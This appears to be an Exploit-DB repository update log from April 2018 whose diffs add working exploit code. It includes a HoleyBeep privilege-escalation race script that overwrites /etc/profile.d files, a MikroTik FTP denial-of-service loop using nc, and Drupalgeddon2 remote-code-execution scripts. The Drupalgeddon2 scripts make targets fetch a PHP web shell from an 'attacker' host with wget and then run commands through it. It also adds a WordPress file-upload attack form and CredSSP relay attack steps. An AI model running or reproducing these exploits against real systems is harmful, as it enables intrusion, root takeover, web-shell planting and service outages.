DB: 2018-04-14

9 changes to exploits/shellcodes

GNU Beep 1.3 - 'HoleyBeep' Local Privilege Escalation

Microsoft Credential Security Support Provider - Remote Code Execution

WordPress Plugin Shopping Cart 3.0.4 - Unrestricted Arbitrary File Upload
Drupal  < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC)
MikroTik 6.41.4 - FTP daemon Denial of Service PoC
Drupal  < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution

exploits/linux/dos/43178.c

@@ -6,9 +6,10 @@ I found the following bug with an AFL-based fuzzer:
 When __walk_page_range() is used on a VM_HUGETLB VMA, callbacks from the mm_walk structure are only invoked for present pages. However, do_mincore() assumes that it will always get callbacks for all pages in the range passed to walk_page_range(), and when this assumption is violated, sys_mincore() copies uninitialized memory from the page allocator to userspace.
 
 This bug can be reproduced with the following testcase:
-*/
 
 $ cat mincore_test.c
+*/
+
 #define _GNU_SOURCE
 #include <unistd.h>
 #include <sys/mman.h>

exploits/linux/local/44452.py

@@ -0,0 +1,90 @@
+#!/usr/bin/env python3
+#
+# E-DB Note ~ https://gist.github.com/Arignir/0b9d45c56551af39969368396e27abe8/ec853f14afd6e86fb3f2efce2086e28f33039ddc
+# E-DB Note ~ https://sigint.sh/#/holeybeep
+#
+# This is an exploit for HoleyBeep.
+#
+# To use it, place any command you want root to execute in `/tmp/x`.
+#    ```
+#    $ cat /tmp/x
+#    echo PWNED $(whoami)
+#    ```
+# The exploit takes a path to write to (the file must already exist) and rewrites its first bytes to /*/x. This means that if it's a shell script, it will execute /tmp/x as its first and only command.
+#
+# To gain root access, the idea is to use the exploit to overwrite any file in /etc/profile.d/ so it will execute /*/x on the next login, possibly as the root user.
+#
+# Variants are possible using cron instead of the shell, so you don't have to wait until root logs in.
+#
+
+import argparse
+import shutil
+import os
+import subprocess
+import time
+import signal
+import ntpath
+
+TMP_PATH="beep_exploit"
+
+def backup_output(path):
+    backup_path = ntpath.basename(path + ".bak")
+    if os.path.isfile(path):
+        shutil.copy(path, backup_path)
+        print('Backup made at \'{}\''.format(backup_path))
+
+def main():
+    parser = argparse.ArgumentParser(description='Holey beep exploit script.')
+    parser.add_argument('output', metavar='OUTPUT', help='the output file to corrupt')
+    parser.add_argument('--path', default="/usr/bin/beep", help='path to beep')
+    parser.add_argument('--time-low', default=6000, type=int, help='time to wait (micro-seconds), lower bound')
+    parser.add_argument('--time-high', default=6900, type=int, help='time to wait (micro-seconds), higher bound')
+    parser.add_argument('--no-backup', action='store_true', help='doesn\'t backup the output file')
+    args = parser.parse_args()
+
+    if not args.no_backup:
+        backup_output(args.output)
+
+    devnull = open("/dev/null")
+
+    timer = args.time_low
+    while True:
+        # Create original symlink
+        try:
+            os.remove(TMP_PATH)
+        except OSError:
+            pass
+        os.symlink("/dev/input/event0", TMP_PATH)
+
+        # Open subprocess
+        p = subprocess.Popen([args.path,  "--device", TMP_PATH, "-l", "1", "-n", "-l", "2016356911"], stderr=devnull)
+        time.sleep(timer/2 / 1000000.0)
+
+        # Replace symlink
+        try:
+            os.remove(TMP_PATH)
+        except OSError:
+            pass
+        os.symlink(args.output, TMP_PATH)
+        time.sleep(timer/2 / 1000000.0)
+
+        # Trigger SIGINT
+        os.kill(p.pid, signal.SIGINT)
+
+        # Kill process if it's sill alive
+        time.sleep(200.0 / 1000000.0)
+        os.kill(p.pid, signal.SIGKILL)
+
+        # Verify result
+        with open(args.output, 'rb') as f:
+            data = f.read(4)
+            if data == b'/*/x':
+                print("Done!")
+                break
+
+        timer += 1
+        if timer > args.time_high:
+            timer = args.time_low
+
+if __name__ == '__main__':
+    main()

exploits/linux/webapps/44450.txt

@@ -0,0 +1,19 @@
+################
+#Title: MikroTik 6.41.4 Denial of service FTP daemon crash
+#CVE: CVE-2018-10070
+#CWE: CWE-400
+#Exploit Author: Hosein Askari (FarazPajohan)
+#Vendor HomePage: https://mikrotik.com/
+#Version : 6.41.4 (Released 2018-Apr-05) | All Version
+#Date: 13-05-2018
+#Category: Network Appliance
+#Description: A vulnerability in MikroTik Version 6.41.4 could allow an unauthenticated remote attacker to exhaust all available CPU and all available RAM by sending crafted FTP requests on port 21 that begins with many '\0' characters, #preventing the affected router from accepting new FTP connections. The router will reboot after 10 minutes, logging a "router was rebooted without proper shutdown" message.
+#POC: https://vimeo.com/264461602
+################
+
+for i in `seq 1 100`
+
+do
+  cat craft |  nc -nv <MikroTik IP> 21 &
+  sleep 2
+done

exploits/php/webapps/35730.html

@@ -1,3 +1,4 @@
+<!--
 # Exploit Title: WordPress Shopping Cart 3.0.4 Unrestricted File Upload
 # Date: 29-10-2014
 # Software Link: https://wordpress.org/plugins/wp-easycart/
@@ -17,6 +18,7 @@ http://security.szurek.pl/wordpress-shopping-cart-304-unrestricted-file-upload.h
 2. Proof of Concept
 
 Login as regular user (created using wp-login.php?action=register):
+-->
 
 <form action="http://wordpress-install/wp-content/plugins/wp-easycart/inc/amfphp/administration/banneruploaderscript.php" method="post" enctype="multipart/form-data">
     <input type="hidden" name="datemd5" value="1">
@@ -24,6 +26,7 @@ Login as regular user (created using wp-login.php?action=register):
     <input value="Upload!" type="submit">
 </form>
 
+<!--
 File will be visible:
 
 http://wordpress-install/wp-content/plugins/wp-easycart/products/banners/%filename%_1.%fileextension%
@@ -31,4 +34,5 @@ http://wordpress-install/wp-content/plugins/wp-easycart/products/banners/%filena
 3. Solution:
   
 Update to version 3.0.9
-https://downloads.wordpress.org/plugin/wp-easycart.3.0.9.zip
+https://downloads.wordpress.org/plugin/wp-easycart.3.0.9.zip
+-->

exploits/php/webapps/44448.py

@@ -0,0 +1,21 @@
+#!/usr/bin/env
+import sys
+import requests
+
+print ('################################################################')
+print ('# Proof-Of-Concept for CVE-2018-7600')
+print ('# by Vitalii Rudnykh')
+print ('# Thanks by AlbinoDrought, RicterZ, FindYanot, CostelSalanders')
+print ('# https://github.com/a2u/CVE-2018-7600')
+print ('################################################################')
+print ('Provided only for educational or information purposes\n')
+
+target = raw_input('Enter target url (example: https://domain.ltd/): ')
+
+url = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' 
+payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'wget http://attacker/hello.txt'}
+
+r = requests.post(url, data=payload)
+if r.status_code != 200:
+  sys.exit("Not exploitable")
+print ('\nCheck: '+target+'hello.txt')

exploits/php/webapps/44449.rb

@@ -0,0 +1,41 @@
+# EDB-Note. Have the contents of "shell" on http://attacker/shell.php
+
+require 'net/http'
+
+# Hans Topo ruby port from Drupalggedon2 exploit.
+# Based on Vitalii Rudnykh exploit
+
+target = ARGV[0]
+command = ARGV[1]
+
+url = target + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
+
+shell = "<?php system($_GET['cmd']); ?>"
+
+payload = 'mail%5B%23markup%5D%3Dwget%20http%3A%2F%2Fattacker%2Fshell.php%26mail%5B%23type%5D%3Dmarkup%26form_id%3Duser_register_form%26_drupal_ajax%3D1%26mail%5B%23post_render%5D%5B%5D%3Dexec'
+
+uri = URI(url)
+
+http = Net::HTTP.new(uri.host,uri.port)
+
+if uri.scheme == 'https'
+	http.use_ssl = true
+	http.verify_mode = OpenSSL::SSL::VERIFY_NONE
+end
+
+req = Net::HTTP::Post.new(uri.path)
+req.body = payload
+
+response = http.request(req)
+
+if response.code != "200"
+	puts "[*] Response: " + response.code
+	puts "[*] Target seems not to be exploitable"
+	exit
+end
+
+puts "[*] Target seems to be exploitable."
+
+exploit_uri = URI(target+"/sh.php?cmd=#{command}")
+response = Net::HTTP.get_response(exploit_uri)
+puts response.body

exploits/windows/remote/44453.md

@@ -0,0 +1,51 @@
+# credssp
+
+This is a poc code for exploiting CVE-2018-0886. It should be used for educational purposes only.
+It relies on a fork of the rdpy project(https://github.com/preempt/rdpy), allowing also credssp relay. 
+
+
+Written by Eyal Karni, Preempt 
+ekarni@preempt.com 
+
+# Build
+
+## Instructions (Linux)
+If you are using Ubuntu 14 , check the install file.. 
+It was tested on Ubuntu 16.04. 
+
+```
+$ git clone https://github.com/preempt/rdpy.git rdpy
+$ git clone https://github.com/preempt/credssp.git 
+$ cd credssp/install
+$ sh install.sh
+$ cd ../../rdpy
+$ sudo python setup.py install
+```
+
+EDB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44453.zip
+
+* It assumes a pretty clean inital state. Best to uninstall first relevant compontants such as cryptography,pyopenssl maybe (pip uninstall cryptography).  
+* A different version of openssl needed to be installed for this to run successfully.  The install script does that. 
+* Please follow the instructions in the described order. 
+
+# Running the exploit 
+
+
+Export a certificate suitable for Server Authentication from any domain.
+
+
+To generate a suitable certificate for the command to execute : 
+
+```
+$ python credssp/bin/gen_cmd.py -c ExportedCert -o exploitc.pem -k exploitk.pem CMD 
+```
+
+(exploitc.pem ,exploitk.pem are the generated certificate and private key respectively)
+
+To run the attack script: 
+
+```
+$ python /usr/local/bin/rdpy-rdpcredsspmitm.py -k exploitk.pem -c exploitc.pem TargetServer
+```
+
+More details are in the usage section of the scripts(--help).

files_exploits.csv

@@ -9642,6 +9642,7 @@ id,file,description,date,author,type,platform,port
 44423,exploits/windows/local/44423.py,"GoldWave 5.70 - Local Buffer Overflow (SEH Unicode)",2018-04-09,bzyo,local,windows,
 44426,exploits/linux/local/44426.py,"PMS 0.42 - Local Stack-Based Overflow (ROP)",2018-04-09,"Juan Sacco",local,linux,
 44438,exploits/windows_x86/local/44438.txt,"DVD X Player Standard 5.5.3.9 - Buffer Overflow",2018-04-10,"Prasenjit Kanti Paul",local,windows_x86,
+44452,exploits/linux/local/44452.py,"GNU Beep 1.3 - 'HoleyBeep' Local Privilege Escalation",2018-04-06,Pirhack,local,linux,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -16390,6 +16391,7 @@ id,file,description,date,author,type,platform,port
 44398,exploits/hardware/remote/44398.py,"Moxa AWK-3131A 1.4 < 1.7  - 'Username' OS Command Injection",2017-04-03,Talos,remote,hardware,
 44415,exploits/android/remote/44415.txt,"LineageOS 14.1 Blueborne - Remote Code Execution",2018-04-06,"Marcin Kozlowski",remote,android,
 44446,exploits/hardware/remote/44446.py,"F5 BIG-IP 11.6 SSL Virtual Server - 'Ticketbleed' Memory Disclosure",2017-02-14,@0x00string,remote,hardware,
+44453,exploits/windows/remote/44453.md,"Microsoft Credential Security Support Provider - Remote Code Execution",2018-04-13,Preempt,remote,windows,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -34877,7 +34879,7 @@ id,file,description,date,author,type,platform,port
 35726,exploits/php/webapps/35726.py,"Getsimple CMS 3.0 - 'set' Local File Inclusion",2011-05-07,"AutoSec Tools",webapps,php,
 35727,exploits/php/webapps/35727.txt,"HOMEPIMA Design - 'filedown.php' Local File Disclosure",2011-05-09,KnocKout,webapps,php,
 35728,exploits/asp/webapps/35728.txt,"Keyfax Customer Response Management 3.2.2.6 - Multiple Cross-Site Scripting Vulnerabilities",2011-05-09,"Richard Brain",webapps,asp,
-35730,exploits/php/webapps/35730.txt,"WordPress Plugin Shopping Cart 3.0.4 - Unrestricted Arbitrary File Upload",2015-01-08,"Kacper Szurek",webapps,php,80
+35730,exploits/php/webapps/35730.html,"WordPress Plugin Shopping Cart 3.0.4 - Unrestricted Arbitrary File Upload",2015-01-08,"Kacper Szurek",webapps,php,80
 35733,exploits/php/webapps/35733.txt,"vBulletin MicroCART 1.1.4 - Arbitrary Files Deletion / SQL Injection / Cross-Site Scripting",2015-01-09,Technidev,webapps,php,80
 35734,exploits/php/webapps/35734.txt,"ZAPms 1.22 - 'nick' SQL Injection",2011-05-09,KedAns-Dz,webapps,php,
 35736,exploits/php/webapps/35736.txt,"poMMo Aardvark PR16.1 - Multiple Cross-Site Scripting Vulnerabilities",2011-05-10,"High-Tech Bridge SA",webapps,php,
@@ -39143,3 +39145,6 @@ id,file,description,date,author,type,platform,port
 44443,exploits/php/webapps/44443.txt,"WordPress Plugin File Upload 4.3.2 - Stored Cross-Site Scripting",2018-04-10,ManhNho,webapps,php,
 44444,exploits/php/webapps/44444.txt,"WordPress Plugin File Upload 4.3.3 - Stored Cross-Site Scripting (PoC)",2018-04-10,ManhNho,webapps,php,
 44447,exploits/php/webapps/44447.txt,"Joomla Convert Forms version 2.0.3 -  Formula Injection (CSV Injection)",2018-04-12,"Sairam Jetty",webapps,php,
+44448,exploits/php/webapps/44448.py,"Drupal  < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC)",2018-04-13,"Vitalii Rudnykh",webapps,php,
+44450,exploits/linux/webapps/44450.txt,"MikroTik 6.41.4 - FTP daemon Denial of Service PoC",2018-04-13,FarazPajohan,webapps,linux,
+44449,exploits/php/webapps/44449.rb,"Drupal  < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution",2018-04-13,"Hans Topo",webapps,php,